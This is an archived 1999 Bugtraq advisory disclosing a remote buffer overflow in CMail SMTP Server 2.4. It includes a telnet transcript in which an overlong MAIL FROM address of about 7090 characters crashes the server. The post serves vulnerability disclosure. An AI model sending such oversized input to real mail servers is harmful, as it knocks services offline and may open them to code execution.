Archive : 1999 : october : cmail - security vulnerabilities database

[EN] securityvulns.ru
no-pyccku

Vulnerability in CMail SMTP Server Version 2.4: Remotely exploitable buffer




=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


    Date: Чт, 29 июл 1999  14:27:45

   От: Luciano Martins <luck@USSRBACK.COM>

 Кому: BUGTRAQ@SECURITYFOCUS.COM

 Тема: Vulnerability in CMail SMTP Server Version 2.4: Remotely exploitable buffer

--------------------------------------------------------------------------------




We found a buffer overflow in the CMail SMTP service (long MAIL FROM:) that

may allow an attacker to execute arbitrary code on the target server, it is

based on the eEye pointed out overflows in cmail 2.3 >:-] Which was never

fixed... software vendors still not taking security issues seriously.





Example:





[cham@guilt cham]$ telnet example.com 25

Trying example.com...

Connected to example.com.

Escape character is '^]'.

220  SMTP services ready. Computalynx CMail Server Version: 2.4

helo ussr

250 Hello ussr [yourip], how are you today?

MAIL FROM: cmail <[buffer]@cmaildotcom.com>



Where [buffer] is aprox. 7090 characters. At his point the server overflows

and crashes. Just a typical buffer overflow that should have been fixed in

version 2.3 when it was pointed out to them.





Luck Martins



u n d e r g r o u n d  s e c u r i t y  s y s t e m s  r e s e a r c h

WWW.USSRBACK.COM